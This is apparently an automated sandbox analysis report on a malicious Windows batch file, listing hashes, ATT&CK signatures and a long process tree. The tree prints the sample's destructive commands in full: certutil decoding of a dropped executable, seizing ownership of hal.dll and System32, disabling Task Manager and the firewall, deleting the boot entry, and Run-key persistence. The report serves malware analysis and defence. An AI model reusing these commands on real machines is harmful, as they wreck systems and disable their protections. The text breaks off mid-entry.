38d50c545102dfa59a5faf795d9fdcbb0a07573453963834ae8b98a76689cffe

Analysis

max time kernel
93s
max time network
215s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
07/07/2024, 23:26

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.cmd
Size

22KB
MD5

3388c1be1e2505fb672d7285d77e3ebb
SHA1

bf44a40c34390e99d2cf62625a42348465b48df6
SHA256

38d50c545102dfa59a5faf795d9fdcbb0a07573453963834ae8b98a76689cffe
SHA512

166e1e232b0559f5b89aa99385ae80590197b1b0f2c2a028065d371ec5f3a06fab8e58d5a65ac15cb64fdadcd37df5f21569c3c73d475624a8e0f1ba7085127a
SSDEEP

384:2iJdAbrM21q0j0L1qEzdQ8PigfwTxX823JWo3yzKpMg:5bAUAW17JQrgodX/BMg

Score

8^/10

defense_evasion discovery evasion execution exploit upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2196	powershell.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3108	netsh.exe
4316	netsh.exe
3940	netsh.exe
1556	netsh.exe

Possible privilege escalation attempt 61 IoCs

exploit

pid	Process
1680	takeown.exe
4124	takeown.exe
4212	takeown.exe
5500	icacls.exe
2588	takeown.exe
4244	icacls.exe
5700	icacls.exe
5176	takeown.exe
1552	icacls.exe
5792	icacls.exe
5284	icacls.exe
2756	icacls.exe
2436	icacls.exe
5948	takeown.exe
5472	takeown.exe
4904	takeown.exe
5032	takeown.exe
2624	icacls.exe
4540	takeown.exe
2528	takeown.exe
4544	takeown.exe
5520	takeown.exe
5208	icacls.exe
5552	icacls.exe
5672	icacls.exe
2348	icacls.exe
4812	icacls.exe
968	takeown.exe
5092	takeown.exe
5420	takeown.exe
5228	takeown.exe
5888	takeown.exe
5600	icacls.exe
4324	takeown.exe
2284	icacls.exe
5480	takeown.exe
5368	icacls.exe
3032	takeown.exe
4684	icacls.exe
5660	icacls.exe
5160	takeown.exe
5444	takeown.exe
2888	takeown.exe
4928	takeown.exe
4248	icacls.exe
2804	takeown.exe
5208	takeown.exe
3644	takeown.exe
244	takeown.exe
4720	icacls.exe
1524	icacls.exe
2320	takeown.exe
5324	icacls.exe
5836	takeown.exe
2756	icacls.exe
180	takeown.exe
3588	takeown.exe
5256	icacls.exe
5436	icacls.exe
5836	takeown.exe
1280	icacls.exe

Executes dropped EXE 1 IoCs

pid	Process
4352	Tasksvc.exe

Modifies file permissions 1 TTPs 61 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1680	takeown.exe
180	takeown.exe
5208	icacls.exe
4540	takeown.exe
5480	takeown.exe
5520	takeown.exe
5444	takeown.exe
4904	takeown.exe
3644	takeown.exe
4720	icacls.exe
5228	takeown.exe
5836	takeown.exe
2436	icacls.exe
5552	icacls.exe
4928	takeown.exe
968	takeown.exe
5420	takeown.exe
5600	icacls.exe
2888	takeown.exe
1524	icacls.exe
4544	takeown.exe
5888	takeown.exe
2624	icacls.exe
2528	takeown.exe
2320	takeown.exe
5792	icacls.exe
1552	icacls.exe
5324	icacls.exe
4684	icacls.exe
4812	icacls.exe
2804	takeown.exe
3032	takeown.exe
5208	takeown.exe
1280	icacls.exe
4124	takeown.exe
244	takeown.exe
4324	takeown.exe
2588	takeown.exe
5368	icacls.exe
5284	icacls.exe
2756	icacls.exe
4244	icacls.exe
5092	takeown.exe
5700	icacls.exe
5032	takeown.exe
3588	takeown.exe
5836	takeown.exe
2756	icacls.exe
4212	takeown.exe
5500	icacls.exe
5660	icacls.exe
5160	takeown.exe
5176	takeown.exe
5672	icacls.exe
2348	icacls.exe
5256	icacls.exe
2284	icacls.exe
4248	icacls.exe
5436	icacls.exe
5948	takeown.exe
5472	takeown.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a00000002350b-241.dat	upx
behavioral2/memory/4352-242-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral2/memory/4352-254-0x0000000000400000-0x000000000040E000-memory.dmp	upx

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Modifies boot configuration data using bcdedit 4 IoCs

pid	Process
3584	bcdedit.exe
2668	bcdedit.exe
2664	bcdedit.exe
3164	bcdedit.exe

Drops autorun.inf file 1 TTPs 1 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\hal.dll	attrib.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\twain_32.dll	attrib.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2084	ipconfig.exe
2164	ipconfig.exe
4488	ipconfig.exe
408	ipconfig.exe

Modifies registry key 1 TTPs 11 IoCs

Modify Registry

T1112

pid	Process
4296	reg.exe
1352	reg.exe
784	reg.exe
3040	reg.exe
1252	reg.exe
4752	reg.exe
2764	reg.exe
860	reg.exe
1552	reg.exe
2652	reg.exe
1620	reg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2888	takeown.exe
Token: 33	836	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	836	AUDIODG.EXE
Token: SeTakeOwnershipPrivilege	1680	takeown.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3968 wrote to memory of 3608	3968	cmd.exe	85
PID 3968 wrote to memory of 3608	3968	cmd.exe	85
PID 3968 wrote to memory of 4352	3968	cmd.exe	86
PID 3968 wrote to memory of 4352	3968	cmd.exe	86
PID 3968 wrote to memory of 4352	3968	cmd.exe	86
PID 3968 wrote to memory of 2888	3968	cmd.exe	87
PID 3968 wrote to memory of 2888	3968	cmd.exe	87
PID 3968 wrote to memory of 2756	3968	cmd.exe	89
PID 3968 wrote to memory of 2756	3968	cmd.exe	89
PID 3968 wrote to memory of 3652	3968	cmd.exe	90
PID 3968 wrote to memory of 3652	3968	cmd.exe	90
PID 3968 wrote to memory of 1680	3968	cmd.exe	92
PID 3968 wrote to memory of 1680	3968	cmd.exe	92
PID 3968 wrote to memory of 4812	3968	cmd.exe	93
PID 3968 wrote to memory of 4812	3968	cmd.exe	93
PID 3968 wrote to memory of 1840	3968	cmd.exe	94
PID 3968 wrote to memory of 1840	3968	cmd.exe	94

Views/modifies file attributes 1 TTPs 31 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
996	attrib.exe
6104	attrib.exe
4204	attrib.exe
1152	attrib.exe
3588	attrib.exe
5684	attrib.exe
2128	attrib.exe
5700	attrib.exe
4488	attrib.exe
5928	attrib.exe
5908	attrib.exe
5672	attrib.exe
5360	attrib.exe
4244	attrib.exe
5648	attrib.exe
968	attrib.exe
3908	attrib.exe
1188	attrib.exe
1280	attrib.exe
5500	attrib.exe
3652	attrib.exe
4340	attrib.exe
5440	attrib.exe
1524	attrib.exe
1840	attrib.exe
6080	attrib.exe
4056	attrib.exe
1368	attrib.exe
1892	attrib.exe
5856	attrib.exe
3768	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
1⤵
- Drops autorun.inf file
- Suspicious use of WriteProcessMemory
PID:3968
- C:\Windows\system32\certutil.exe
  certutil -decode "Bytebeat.sk" "Tasksvc.exe"
  2⤵
  PID:3608
- C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe
  "Tasksvc.exe"
  2⤵
  - Executes dropped EXE
  PID:4352
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\hal.dll"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2888
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\hal.dll" /reset /c /q
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2756
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\hal.dll"
  2⤵
  - Drops file in System32 directory
  - Views/modifies file attributes
  PID:3652
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\Twain_32.dll"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\Twain_32.dll" /reset /c /q
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4812
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\Twain_32.dll"
  2⤵
  - Drops file in Windows directory
  - Views/modifies file attributes
  PID:1840
- C:\Windows\system32\reg.exe
  REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
  2⤵
  PID:4716
- C:\Windows\system32\rundll32.exe
  rundll32 user32.dll, SwapMouseButton
  2⤵
  PID:4780
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:784
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:3040
- C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  2⤵
  - Modifies Windows Firewall
  PID:3108
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3584
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\Admin\AppData\Local\Temp\MouseMove.ps1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K Taskdl.bat
  2⤵
  PID:4548
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32" /r
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4124
- C:\Windows\system32\wscript.exe
  WScript Informacion.vbs
  2⤵
  PID:4628
- C:\Windows\system32\ipconfig.exe
  ipconfig /release
  2⤵
  - Gathers network information
  PID:2084
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h *.*
  2⤵
  - Views/modifies file attributes
  PID:3908
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:1048
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:1848
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:3064
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:4348
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:1816
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:1344
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:2680
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:2200
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:1836
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:4504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:4308
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4540
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4244
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Views/modifies file attributes
    PID:4488
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4324
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2284
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    - Views/modifies file attributes
    PID:3588
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:2172
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:996
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1552
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4296
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3940
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:2132
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2528
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:944
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:2164
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:1368
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1988
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4428
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3052
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4148
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4516
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3180
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3472
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3528
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1480
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:780
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5420
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5600
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:5672
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4544
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5256
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:1280
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:4180
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:624
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:860
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:3748
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5480
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5660
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:5856
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5160
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5368
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:5440
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:4028
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:4644
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:2764
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4700
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5520
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5700
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:5928
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5228
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5436
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:5684
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:1820
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:4944
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:1352
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1192
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2320
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:2404
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:968
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4720
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Views/modifies file attributes
    PID:4340
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:180
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2436
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    - Views/modifies file attributes
    PID:1152
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:416
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:4484
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1620
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4752
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1556
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:4984
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2588
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:1056
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:408
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:1892
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2304
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1340
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:948
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1372
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1152
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4488
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3420
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1556
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1172
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5560
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2804
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5792
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:5500
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3032
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2756
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:5360
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5712
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5888
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5208
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:3768
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5836
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5284
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:996
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5980
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5472
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5324
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:5700
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4212
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2348
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:4056
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:6048
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5176
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:4276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:1120
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:244
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1524
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Views/modifies file attributes
    PID:4204
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5092
- - C:\Windows\system32\icacls.exe
